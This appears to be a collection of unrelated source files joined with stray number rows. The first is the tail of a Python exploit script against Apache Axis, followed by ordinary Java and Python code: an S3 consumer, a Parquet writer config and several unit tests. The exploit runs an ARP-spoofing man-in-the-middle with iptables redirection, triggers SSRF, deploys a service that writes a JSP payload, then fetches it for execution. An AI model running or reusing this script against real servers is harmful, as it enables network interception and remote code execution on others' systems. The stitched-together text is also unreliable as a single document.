url = pathtoaxis+"/services/exploitservice"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "something", "Content-Type": "text/xml;charset=UTF-8"}
data="<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:api=\"http://127.0.0.1/Integrics/Enswitch/API\"\r\n xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\n xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Body>\r\n <api:main\r\n soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <api:in0><![CDATA[\r\n"+jsppayload+"\r\n]]>\r\n </api:in0>\r\n </api:main>\r\n </soapenv:Body>\r\n</soapenv:Envelope>"
requests.post(url, headers=headers, data=data)
def TriggerSSRF(pathtoaxis):
url = pathtoaxis+"/StockQuoteService.jws"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "", "Content-Type": "text/xml;charset=UTF-8"}
data="<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:def=\"http://DefaultNamespace\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <def:getQuote soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <symbol xsi:type=\"xsd:string\">dwas</symbol>\r\n </def:getQuote>\r\n </soapenv:Body>\r\n</soapenv:Envelope>"
requests.post(url, headers=headers, data=data)
def StartMitm(interface,target,gateway):
subprocess.Popen("echo 1 > /proc/sys/net/ipv4/ip_forward",shell=True)#Enable forwarding
subprocess.Popen("arpspoof -i {} -t {} {}".format(interface,target,gateway),shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)#spoof target -> gateway
subprocess.Popen("iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True)#use iptable to redirect back to our web server
def KillMitm(target,myip):
subprocess.Popen("pkill arpspoof",shell=True)
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward",shell=True)
subprocess.Popen("iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True)
def SSRFRedirect(new_path):
class myHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', new_path)
self.end_headers()
PORT = 80
SocketServer.TCPServer.allow_reuse_address = True
handler = SocketServer.TCPServer(("", PORT), myHandler)
print "[+] Waiting to redirect"
handler.handle_request()
print "[+] Payload URL sent"
def ExecuteJsp(pathtoaxis):
subprocess.Popen("curl "+pathtoaxis+"/exploit.jsp",shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print "[+] Starting MITM"
StartMitm(spoofinterface,target,gateway)
sleep(2)
print "[+] Starting web server for SSRF"
thread.start_new_thread(SSRFRedirect,(deployurl,))
print "[+] Using StockQuoteService.jws to trigger SSRF"
TriggerSSRF(pathtoaxis)
print "[+] Waiting 3 seconds for incoming request"
sleep(3)
print "[+] Writing JSP payload"
CreateJsp(pathtoaxis,payloadfile)
print "[+] Cleaning up exploit service"
thread.start_new_thread(SSRFRedirect,(undeployurl,))
TriggerSSRF(pathtoaxis)
print "[+] Cleaning up man in the middle"
KillMitm(target,myip)
print "[+] Waiting 2 seconds for JSP write"
sleep(2)
ExecuteJsp(pathtoaxis)
print "[+] Default URL to the jsp payload:"
print pathtoaxis+"/exploit.jsp"
| 3,223 |
537 | <filename>suro-s3/src/main/java/com/netflix/suro/input/remotefile/S3Consumer.java
package com.netflix.suro.input.remotefile;
import com.amazonaws.auth.AWSCredentialsProvider;
import com.amazonaws.auth.AWSSessionCredentials;
import com.fasterxml.jackson.annotation.JacksonInject;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Preconditions;
import com.google.common.util.concurrent.ThreadFactoryBuilder;
import com.netflix.servo.monitor.DynamicCounter;
import com.netflix.servo.monitor.MonitorConfig;
import com.netflix.suro.input.RecordParser;
import com.netflix.suro.input.SuroInput;
import com.netflix.suro.message.MessageContainer;
import com.netflix.suro.routing.MessageRouter;
import com.netflix.suro.sink.notice.Notice;
import com.netflix.suro.sink.remotefile.AWSSessionCredentialsAdapter;
import com.netflix.util.Pair;
import org.apache.commons.io.FileUtils;
import org.jets3t.service.Jets3tProperties;
import org.jets3t.service.impl.rest.httpclient.RestS3Service;
import org.jets3t.service.model.S3Object;
import org.jets3t.service.security.AWSCredentials;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.concurrent.*;
import java.util.concurrent.atomic.AtomicLong;
import java.util.zip.GZIPInputStream;
/**
 * {@link SuroInput} that polls a {@link Notice} for download notifications,
 * fetches the referenced S3 objects into a local directory, parses each line
 * of the downloaded files with a {@link RecordParser}, and routes the
 * resulting messages through the {@link MessageRouter}.
 *
 * Thread model: one polling task reads notices in a loop and hands each one
 * to a bounded download pool. The pool's work queue blocks the producer
 * instead of rejecting tasks, so polling naturally slows down under load.
 */
public class S3Consumer implements SuroInput {
    public static final String TYPE = "s3";

    private static final Logger log = LoggerFactory.getLogger(S3Consumer.class);

    private final String id;
    private final String s3Endpoint;
    private final long timeout;
    private final int concurrentDownload;
    private final Notice<String> notice;
    private final RecordParser recordParser;
    private final String downloadPath;

    private AWSCredentialsProvider credentialsProvider;
    private RestS3Service s3Service;
    private volatile boolean running = false;
    private ExecutorService executor;
    private Future<?> runner = null;

    private final MessageRouter router;
    private final ObjectMapper jsonMapper;

    /**
     * @param id                 unique id of this input
     * @param s3Endpoint         S3 endpoint host; defaults to "s3.amazonaws.com"
     * @param notice             source of download notifications (required)
     * @param timeout            sleep in ms between polls when no notice is
     *                           available; defaults to 1000
     * @param concurrentDownload size of the download pool; defaults to 5
     * @param downloadPath       local directory for downloaded files; defaults
     *                           to /logs/suro-s3consumer/&lt;id&gt;
     * @param recordParser       parser applied to each line of a downloaded
     *                           file (required)
     * @param credentialProvider AWS credentials used when no RestS3Service is
     *                           injected
     * @param s3Service          optional pre-built jets3t client (tests inject
     *                           a mock here); built lazily in start() if null
     */
    @JsonCreator
    public S3Consumer(
            @JsonProperty("id") String id,
            @JsonProperty("s3Endpoint") String s3Endpoint,
            @JsonProperty("notice") Notice notice,
            @JsonProperty("recvTimeout") long timeout,
            @JsonProperty("concurrentDownload") int concurrentDownload,
            @JsonProperty("downloadPath") String downloadPath,
            @JsonProperty("recordParser") RecordParser recordParser,
            @JacksonInject AWSCredentialsProvider credentialProvider,
            @JacksonInject MessageRouter router,
            @JacksonInject ObjectMapper jsonMapper,
            @JacksonInject RestS3Service s3Service
    ) {
        this.id = id;
        this.s3Endpoint = s3Endpoint == null ? "s3.amazonaws.com" : s3Endpoint;
        this.notice = notice;
        this.timeout = timeout == 0 ? 1000 : timeout;
        this.concurrentDownload = concurrentDownload == 0 ? 5 : concurrentDownload;
        this.recordParser = recordParser;
        this.downloadPath = downloadPath == null ? "/logs/suro-s3consumer/" + id : downloadPath;
        this.credentialsProvider = credentialProvider;
        this.router = router;
        this.jsonMapper = jsonMapper;
        this.s3Service = s3Service;

        Preconditions.checkNotNull(notice, "notice is needed");
        Preconditions.checkNotNull(recordParser, "recordParser is needed");
    }

    @Override
    public String getId() {
        return id;
    }

    /** Upper bound in ms for a single pause requested via setPause(). */
    private static final long MAX_PAUSE = 10000;

    /**
     * Builds the jets3t client if none was injected, starts the download pool
     * and the notice-polling task.
     */
    @Override
    public void start() throws Exception {
        if (s3Service == null) {
            Jets3tProperties properties = new Jets3tProperties();
            properties.setProperty("s3service.s3-endpoint", s3Endpoint);

            // Session credentials need the adapter; plain credentials are
            // passed directly.
            if (credentialsProvider.getCredentials() instanceof AWSSessionCredentials) {
                s3Service = new RestS3Service(
                        new AWSSessionCredentialsAdapter(credentialsProvider),
                        null, null, properties);
            } else {
                s3Service = new RestS3Service(
                        new AWSCredentials(
                                credentialsProvider.getCredentials().getAWSAccessKeyId(),
                                credentialsProvider.getCredentials().getAWSSecretKey()),
                        null, null, properties);
            }
        }

        // +1 thread for the polling task submitted below. The overridden
        // offer() blocks instead of rejecting, throttling the poller when all
        // download slots are busy.
        executor = new ThreadPoolExecutor(
                concurrentDownload + 1,
                concurrentDownload + 1,
                0, TimeUnit.MILLISECONDS,
                new ArrayBlockingQueue<Runnable>(concurrentDownload) {
                    @Override
                    public boolean offer(Runnable runnable) {
                        try {
                            put(runnable); // not to reject the task, slowing down
                        } catch (InterruptedException e) {
                            // do nothing
                        }
                        return true;
                    }
                },
                new ThreadFactoryBuilder().setDaemon(true).setNameFormat("S3Consumer-" + id + "-%d").build());

        notice.init();

        running = true;
        runner = executor.submit(new Runnable() {
            @Override
            public void run() {
                while (running) {
                    try {
                        // Honor any backpressure requested through setPause().
                        long pause = Math.min(pausedTime.get(), MAX_PAUSE);
                        if (pause > 0) {
                            Thread.sleep(pause);
                            pausedTime.set(0);
                        }
                        // peek() (not remove) so the notice survives a crash;
                        // it is removed only after successful processing.
                        Pair<String, String> msg = notice.peek();
                        if (msg != null) {
                            executor.submit(createDownloadRunnable(msg));
                        } else {
                            Thread.sleep(timeout);
                        }
                    } catch (Exception e) {
                        log.error("Exception on receiving messages from Notice", e);
                    }
                }
            }
        });
    }

    /**
     * Stops the polling task, drains the download pool and shuts down the S3
     * client. NOTE(review): assumes start() was called before shutdown();
     * runner/executor would be null otherwise.
     */
    @Override
    public void shutdown() {
        try {
            log.info("shutting down S3Consumer now");

            running = false;
            try {
                runner.get();
            } catch (InterruptedException e) {
                // do nothing
            } catch (ExecutionException e) {
                log.error("Exception on stopping the task", e);
            }

            executor.shutdown();
            while (true) {
                if (!executor.awaitTermination(timeout * 5, TimeUnit.MILLISECONDS)) {
                    log.warn("downloading jobs were not terminated gracefully, retry again...");
                } else {
                    break;
                }
            }

            s3Service.shutdown();
        } catch (Exception e) {
            log.error("Exception on shutting down s3Service: " + e.getMessage(), e);
        }
    }

    /** Accumulated pause requested by downstream backpressure, in ms. */
    private AtomicLong pausedTime = new AtomicLong(0);

    @Override
    public void setPause(long ms) {
        pausedTime.addAndGet(ms);
    }

    public static TypeReference<Map<String, Object>> typeReference = new TypeReference<Map<String, Object>>() {};

    private static final int retryCount = 5;
    private static final int sleepOnS3Exception = 5000;

    /**
     * Builds the task that downloads every S3 object referenced by the notice,
     * parses the files line by line, routes the messages, and finally removes
     * the notice. On an invalid notice a no-op logging task is returned.
     */
    private Runnable createDownloadRunnable(final Pair<String, String> msg) {
        Map<String, Object> msgMap;
        try {
            msgMap = parseMessage(msg);
        } catch (Exception e) {
            log.error("Invalid message: " + e.getMessage(), e);
            return createEmptyRunnable(msg);
        }

        String s3Bucket;
        List<String> s3ObjectKey;
        try {
            s3Bucket = (String) msgMap.get("s3Bucket");
            s3ObjectKey = (List<String>) msgMap.get("s3ObjectKey");
            if (s3Bucket == null || s3ObjectKey == null) {
                throw new NullPointerException("s3Bucket or s3ObjectKey is null");
            }
        } catch (Exception e) {
            log.error("Invalid message: " + e.getMessage(), e);
            return createEmptyRunnable(msg);
        }

        final String s3BucketClone = s3Bucket;
        final List<String> s3ObjectKeyClone = s3ObjectKey;

        return new Runnable() {
            @Override
            public void run() {
                List<String> downloadedFiles = new ArrayList<String>();

                // Phase 1: download every object, retrying transient failures.
                for (String path : s3ObjectKeyClone) {
                    boolean success = false;
                    String localFileName = path.replace("/", "");
                    for (int i = 0; i < retryCount; ++i) {
                        try {
                            S3Object object = s3Service.getObject(s3BucketClone, path);
                            FileUtils.copyInputStreamToFile(object.getDataInputStream(),
                                    new File(downloadPath, localFileName));
                            success = true;
                            log.info(path + " downloaded successfully");
                            break;
                        } catch (Exception e) {
                            log.error("Exception on downloading and processing file: " + e.getMessage(), e);
                            DynamicCounter.increment(
                                    MonitorConfig.builder("s3Exception").withTag("consumerId", id).build());
                            try {
                                Thread.sleep(sleepOnS3Exception);
                            } catch (InterruptedException e1) {
                                // do nothing
                            }
                        }
                    }
                    if (success) {
                        downloadedFiles.add(localFileName);
                    }
                }

                // Phase 2: only if every object downloaded, parse + route, then
                // acknowledge the notice. Otherwise the notice stays for retry.
                if (s3ObjectKeyClone.size() == downloadedFiles.size()) {
                    for (String path : downloadedFiles) {
                        try {
                            // try-with-resources: the original leaked the reader
                            // whenever a read failed mid-file.
                            // NOTE(review): the reader uses the platform default
                            // charset; confirm files are written in it.
                            try (BufferedReader br = new BufferedReader(
                                    new InputStreamReader(
                                            createInputStream(path)))) {
                                String data;
                                while ((data = br.readLine()) != null) {
                                    try {
                                        if (data.trim().length() > 0) {
                                            // renamed from msg: it shadowed the
                                            // captured notice Pair above
                                            for (MessageContainer container : recordParser.parse(data)) {
                                                router.process(S3Consumer.this, container);
                                            }
                                        }
                                    } catch (Exception e) {
                                        log.error("Exception on parsing and processing: " + e.getMessage(), e);
                                    }
                                }
                            }
                            deleteFile(path);
                        } catch (Exception e) {
                            log.error("Exception on processing downloaded file: " + e.getMessage(), e);
                            DynamicCounter.increment(
                                    MonitorConfig.builder("processingException").withTag("consumerId", id).build()
                            );
                        }
                    }
                    notice.remove(msg.first());
                }
            }
        };
    }

    /**
     * Deletes a downloaded file. The original looped `while (f.exists())
     * f.delete()`, which never terminates if the delete keeps failing (e.g.
     * permissions); try once and log instead.
     */
    private void deleteFile(String path) {
        File f = new File(downloadPath, path);
        if (f.exists() && !f.delete()) {
            log.warn("failed to delete downloaded file: " + f.getAbsolutePath());
        }
    }

    /**
     * Extracts the payload map from a notice. Handles both an embedded JSON
     * string ("Message" is a String, e.g. SNS-wrapped) and an already-parsed
     * map.
     */
    @VisibleForTesting
    protected Map<String, Object> parseMessage(Pair<String, String> msg) throws IOException {
        Map<String, Object> msgContainer = jsonMapper.readValue(msg.second(), typeReference);

        if (!(msgContainer.get("Message") instanceof Map)) {
            return jsonMapper.readValue(msgContainer.get("Message").toString(), typeReference);
        } else {
            return (Map<String, Object>) msgContainer.get("Message");
        }
    }

    /** Opens a downloaded file, transparently decompressing .gz files. */
    private InputStream createInputStream(String path) throws IOException {
        if (path.endsWith(".gz")) {
            return new GZIPInputStream(
                    new FileInputStream(new File(downloadPath, path)));
        } else {
            return new FileInputStream(new File(downloadPath, path));
        }
    }

    /** No-op task used when a notice cannot be parsed; just logs it. */
    private Runnable createEmptyRunnable(final Pair<String, String> msg) {
        return new Runnable() {
            @Override
            public void run() {
                log.error("invalid msg: " + msg.second());
            }
        };
    }

    /** Equality is by consumer id only, consistent with hashCode(). */
    @Override
    public boolean equals(Object o) {
        if (o instanceof S3Consumer) {
            S3Consumer that = (S3Consumer) o; // was misleadingly named kafkaConsumer
            return that.id.equals(id);
        } else {
            return false;
        }
    }

    @Override
    public int hashCode() {
        return (getId()).hashCode();
    }
}
| 6,614 |
1,110 | from cms.test_utils.project.pluginapp.plugins.manytomany_rel.models import Article, Section
from django.contrib import admin
from django.contrib.admin import ModelAdmin
# Expose the pluginapp test models in the Django admin using the stock
# ModelAdmin, so their many-to-many relations can be exercised via admin views.
admin.site.register(Section, ModelAdmin)
admin.site.register(Article, ModelAdmin)
| 75 |
377 | /**
* Copyright 2012 Impetus Infotech.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.impetus.client.neo4j.imdb;
import javax.persistence.metamodel.Metamodel;
import junit.framework.Assert;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import com.impetus.kundera.metadata.KunderaMetadataManager;
import com.impetus.kundera.metadata.model.EntityMetadata;
/**
 * Test case for validating correctness of the metamodel built for entities
 * linked through a Map-based association: Actor and Movie are associated via
 * Role, which serves as the map key on both sides.
 *
 * @author amresh.singh
 */
public class IMDBMapMetamodelTest extends IMDBTestBase
{
    /**
     * Prepares the fixture before each test.
     *
     * @throws java.lang.Exception
     */
    @Before
    public void setUp() throws Exception
    {
        init();
    }

    /**
     * Cleans persisted state after each test.
     *
     * @throws java.lang.Exception
     */
    @After
    public void tearDown() throws Exception
    {
        clean();
    }

    @Test
    public void testMetamodel()
    {
        // Actor side: the "movies" relation maps Role keys to Movie values
        // and joins over the ACTS_IN column.
        EntityMetadata actorMetadata = KunderaMetadataManager.getEntityMetadata(kunderaMetadata, Actor.class);
        Assert.assertNotNull(actorMetadata);
        Assert.assertEquals(Actor.class, actorMetadata.getEntityClazz());
        Assert.assertEquals(Role.class, actorMetadata.getRelation("movies").getMapKeyJoinClass());
        Assert.assertEquals(Movie.class, actorMetadata.getRelation("movies").getTargetEntity());
        Assert.assertEquals("ACTS_IN", actorMetadata.getRelation("movies").getJoinColumnName(kunderaMetadata));

        // Movie side mirrors the association: Actor values keyed by Role.
        EntityMetadata movieMetadata = KunderaMetadataManager.getEntityMetadata(kunderaMetadata, Movie.class);
        Assert.assertNotNull(movieMetadata);
        Assert.assertEquals(Movie.class, movieMetadata.getEntityClazz());
        Assert.assertEquals(Role.class, movieMetadata.getRelation("actors").getMapKeyJoinClass());
        Assert.assertEquals(Actor.class, movieMetadata.getRelation("actors").getTargetEntity());
        Assert.assertNotNull(movieMetadata.getRelation("actors").getJoinColumnName(kunderaMetadata));
        Assert.assertEquals("actors", movieMetadata.getRelation("actors").getJoinColumnName(kunderaMetadata));

        // Role is the map-key entity; its metadata only needs to resolve.
        EntityMetadata roleMetadata = KunderaMetadataManager.getEntityMetadata(kunderaMetadata, Role.class);
        Assert.assertNotNull(roleMetadata);
        Assert.assertEquals(Role.class, roleMetadata.getEntityClazz());

        // The metamodel for the "imdb" persistence unit itself must resolve.
        Metamodel metamodel = KunderaMetadataManager.getMetamodel(kunderaMetadata, "imdb");
        Assert.assertNotNull(metamodel);
    }
}
| 1,032 |
918 | <filename>gobblin-modules/gobblin-parquet-common/src/main/java/org/apache/gobblin/parquet/writer/ParquetWriterConfiguration.java
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.gobblin.parquet.writer;
import org.apache.hadoop.fs.Path;
import com.typesafe.config.Config;
import lombok.Getter;
import lombok.ToString;
import org.apache.gobblin.configuration.State;
import org.apache.gobblin.util.ConfigUtils;
import org.apache.gobblin.util.ForkOperatorUtils;
import static org.apache.gobblin.configuration.ConfigurationKeys.LOCAL_FS_URI;
import static org.apache.gobblin.configuration.ConfigurationKeys.WRITER_CODEC_TYPE;
import static org.apache.gobblin.configuration.ConfigurationKeys.WRITER_FILE_SYSTEM_URI;
import static org.apache.gobblin.configuration.ConfigurationKeys.WRITER_PREFIX;
/**
* Holds configuration for the {@link ParquetHdfsDataWriter}
*/
@Getter @ToString
public class ParquetWriterConfiguration {
  // Per-writer configuration keys; each is resolved per fork branch through
  // getProperty() before lookup.
  public static final String WRITER_PARQUET_PAGE_SIZE = WRITER_PREFIX + ".parquet.pageSize";
  public static final String WRITER_PARQUET_DICTIONARY_PAGE_SIZE = WRITER_PREFIX + ".parquet.dictionaryPageSize";
  public static final String WRITER_PARQUET_DICTIONARY = WRITER_PREFIX + ".parquet.dictionary";
  public static final String WRITER_PARQUET_VALIDATE = WRITER_PREFIX + ".parquet.validate";
  public static final String WRITER_PARQUET_VERSION = WRITER_PREFIX + ".parquet.version";
  // NOTE(review): DEFAULT_PARQUET_WRITER is not referenced anywhere in this
  // class (DEFAULT_WRITER_VERSION below holds the same "v1" value) — confirm
  // whether it is still used by callers or is dead.
  public static final String DEFAULT_PARQUET_WRITER = "v1";
  public static final String WRITER_PARQUET_FORMAT = WRITER_PREFIX + ".parquet.format";
  public static final String DEFAULT_PARQUET_FORMAT = "group";
  // Size defaults in bytes: 128 MB row-group block, 1 MB page.
  public static final int DEFAULT_BLOCK_SIZE = 128 * 1024 * 1024;
  public static final int DEFAULT_PAGE_SIZE = 1 * 1024 * 1024;
  public static final String DEFAULT_COMPRESSION_CODEC_NAME = "UNCOMPRESSED";
  // NOTE(review): the ALLOWED_* arrays are not checked within this class;
  // presumably validation happens in the writer builder — confirm.
  public static final String[] ALLOWED_COMPRESSION_CODECS = {"SNAPPY", "LZO", "UNCOMPRESSED", "GZIP"};
  public static final boolean DEFAULT_IS_DICTIONARY_ENABLED = true;
  public static final boolean DEFAULT_IS_VALIDATING_ENABLED = false;
  public static final String DEFAULT_WRITER_VERSION = "v1";
  public static final String[] ALLOWED_WRITER_VERSIONS = {"v1", "v2"};
  // Resolved configuration values (exposed via Lombok @Getter on the class).
  private final int pageSize;
  private final int dictPageSize;
  private final boolean dictionaryEnabled;
  private final boolean validate;
  private final String writerVersion;
  private final ParquetRecordFormat recordFormat;
  // Fork branch coordinates used to resolve branch-specific property names.
  private final int numBranches;
  private final int branchId;
  private final String codecName;
  // Staging file path made absolute against the writer filesystem URI.
  private final Path absoluteStagingFile;
  private final int blockSize;
  // Convenience constructor: converts a Gobblin State into a typesafe Config.
  public ParquetWriterConfiguration(State state, int numBranches, int branchId, Path stagingFile, int blockSize) {
    this(ConfigUtils.propertiesToConfig(state.getProperties()), numBranches, branchId, stagingFile, blockSize);
  }
  // Resolves a key to its branch-qualified form (e.g. key.0, key.1).
  private String getProperty(String key) {
    return ForkOperatorUtils.getPropertyNameForBranch(key, numBranches, branchId);
  }
  // Reads the record format ("group" by default) from config; case-insensitive.
  public static ParquetRecordFormat getRecordFormatFromConfig(Config config) {
    String writeSupport = ConfigUtils.getString(config, WRITER_PARQUET_FORMAT, DEFAULT_PARQUET_FORMAT);
    ParquetRecordFormat recordFormat = ParquetRecordFormat.valueOf(writeSupport.toUpperCase());
    return recordFormat;
  }
  // Package-private main constructor: resolves every setting from config,
  // falling back to the defaults declared above.
  ParquetWriterConfiguration(Config config, int numBranches, int branchId, Path stagingFile, int blockSize) {
    this.numBranches = numBranches;
    this.branchId = branchId;
    this.pageSize = ConfigUtils.getInt(config, getProperty(WRITER_PARQUET_PAGE_SIZE), DEFAULT_PAGE_SIZE);
    // NOTE(review): the dictionary page size falls back to DEFAULT_BLOCK_SIZE
    // (128 MB) rather than DEFAULT_PAGE_SIZE — looks unintended; confirm.
    this.dictPageSize = ConfigUtils.getInt(config, getProperty(WRITER_PARQUET_DICTIONARY_PAGE_SIZE), DEFAULT_BLOCK_SIZE);
    this.dictionaryEnabled =
        ConfigUtils.getBoolean(config, getProperty(WRITER_PARQUET_DICTIONARY), DEFAULT_IS_DICTIONARY_ENABLED);
    this.validate = ConfigUtils.getBoolean(config, getProperty(WRITER_PARQUET_VALIDATE), DEFAULT_IS_VALIDATING_ENABLED);
    String rootURI = ConfigUtils.getString(config, WRITER_FILE_SYSTEM_URI, LOCAL_FS_URI);
    this.absoluteStagingFile = new Path(rootURI, stagingFile);
    this.codecName = ConfigUtils.getString(config,getProperty(WRITER_CODEC_TYPE), DEFAULT_COMPRESSION_CODEC_NAME);
    this.recordFormat = getRecordFormatFromConfig(config);
    this.writerVersion = ConfigUtils.getString(config, getProperty(WRITER_PARQUET_VERSION), DEFAULT_WRITER_VERSION);
    this.blockSize = blockSize;
  }
}
| 1,653 |
1,171 | #ifdef __OBJC__
// Objective-C translation units pull in UIKit; the non-ObjC branch below only
// needs a definition of FOUNDATION_EXPORT with the right linkage.
#import <UIKit/UIKit.h>
#else
#ifndef FOUNDATION_EXPORT
#if defined(__cplusplus)
#define FOUNDATION_EXPORT extern "C"
#else
#define FOUNDATION_EXPORT extern
#endif
#endif
#endif
// Framework version symbols for the Pods_Sizes_Example target; values are
// supplied at build time (this appears to be a CocoaPods-generated umbrella
// header — avoid editing by hand).
FOUNDATION_EXPORT double Pods_Sizes_ExampleVersionNumber;
FOUNDATION_EXPORT const unsigned char Pods_Sizes_ExampleVersionString[];
| 121 |
890 | <reponame>Joey-Wondersign/Staffjoy-suite-Joey<filename>tests/unit/models/test_user.py
from tests.unit.test_base import BasicsTestCase
from flask import g
from app import db
from app.models import Location, Role, User
class AppTestUser(BasicsTestCase):
    """Tests for the permission-helper methods on the User model.

    Relies on fixtures provided by BasicsTestCase: ``self.admin`` (org admin),
    ``self.manager`` (manager of ``self.location``), ``self.user1`` /
    ``self.user2`` (workers), ``self.organization`` and ``self.location``.
    Each test sets ``g.current_user`` to impersonate a user, mirroring how
    the app resolves the acting user at request time.
    """

    def test_is_sudo(self):
        """Only users created with sudo=True report is_sudo()."""
        # admin is not
        g.current_user = self.admin
        assert not g.current_user.is_sudo()
        # manager is not
        g.current_user = self.manager
        assert not g.current_user.is_sudo()
        # user1 is not
        g.current_user = self.user1
        assert not g.current_user.is_sudo()
        # make a sudo user
        sudo_dude = User(
            email="<EMAIL>", name="<NAME>", sudo=True)
        db.session.add(sudo_dude)
        db.session.commit()
        g.current_user = sudo_dude
        assert g.current_user.is_sudo()

    def test_is_org_admin_or_location_manager(self):
        """Org admins pass for any location; managers only for their own."""
        # create a 2nd location
        location2 = Location(
            name="2nd Location",
            organization_id=self.organization.id,
            timezone="UTC")
        db.session.add(location2)
        db.session.commit()
        # org admins can access all
        g.current_user = self.admin
        assert g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=self.location.id)
        assert g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=location2.id)
        # role to users are not either
        g.current_user = self.user2
        assert not g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=self.location.id)
        assert not g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=location2.id)
        # location managers have selective access
        g.current_user = self.manager
        assert g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=self.location.id)
        assert not g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=location2.id)
        # make user2 a manager of the new location
        location2.managers.append(self.user2)
        db.session.commit()
        g.current_user = self.user2
        assert not g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=self.location.id)
        assert g.current_user.is_org_admin_or_location_manager(
            org_id=self.organization.id, location_id=location2.id)

    def test_is_org_admin(self):
        """Only org admins pass is_org_admin(); managers/workers do not."""
        # org admins have access
        g.current_user = self.admin
        assert g.current_user.is_org_admin(org_id=self.organization.id)
        # role to users do not
        g.current_user = self.user2
        assert not g.current_user.is_org_admin(org_id=self.organization.id)
        # location managers do not
        g.current_user = self.manager
        assert not g.current_user.is_org_admin(org_id=self.organization.id)

    def test_is_manager_in_org(self):
        """is_manager_in_org() is true only for managers of some location
        in the org — org admins themselves do not count."""
        # org admins are not managers
        g.current_user = self.admin
        assert not g.current_user.is_manager_in_org(
            org_id=self.organization.id)
        # role to users do not
        g.current_user = self.user2
        assert not g.current_user.is_manager_in_org(
            org_id=self.organization.id)
        # location managers do
        g.current_user = self.manager
        assert g.current_user.is_manager_in_org(org_id=self.organization.id)
        # create a 2nd location
        location2 = Location(
            name="2nd Location",
            organization_id=self.organization.id,
            timezone="UTC")
        db.session.add(location2)
        db.session.commit()
        # make user2 a manager of the new location
        location2.managers.append(self.user2)
        db.session.commit()
        g.current_user = self.user2
        assert g.current_user.is_manager_in_org(org_id=self.organization.id)

    def test_is_location_manager(self):
        """is_location_manager() is scoped to the specific location managed."""
        # create a 2nd location
        location2 = Location(
            name="2nd Location",
            organization_id=self.organization.id,
            timezone="UTC")
        db.session.add(location2)
        db.session.commit()
        # org admins are not managers
        g.current_user = self.admin
        assert not g.current_user.is_location_manager(
            location_id=self.location.id)
        assert not g.current_user.is_location_manager(location_id=location2.id)
        # role to users are not either
        g.current_user = self.user2
        assert not g.current_user.is_location_manager(
            location_id=self.location.id)
        assert not g.current_user.is_location_manager(location_id=location2.id)
        # location managers have selective access
        g.current_user = self.manager
        assert g.current_user.is_location_manager(location_id=self.location.id)
        assert not g.current_user.is_location_manager(location_id=location2.id)
        # make user2 a manager of the new location
        location2.managers.append(self.user2)
        db.session.commit()
        g.current_user = self.user2
        assert not g.current_user.is_location_manager(
            location_id=self.location.id)
        assert g.current_user.is_location_manager(location_id=location2.id)

    def test_is_location_worker(self):
        """Only users holding a role in the location are workers there;
        admins and managers are not."""
        # create a 2nd location
        location2 = Location(
            name="2nd Location",
            organization_id=self.organization.id,
            timezone="UTC")
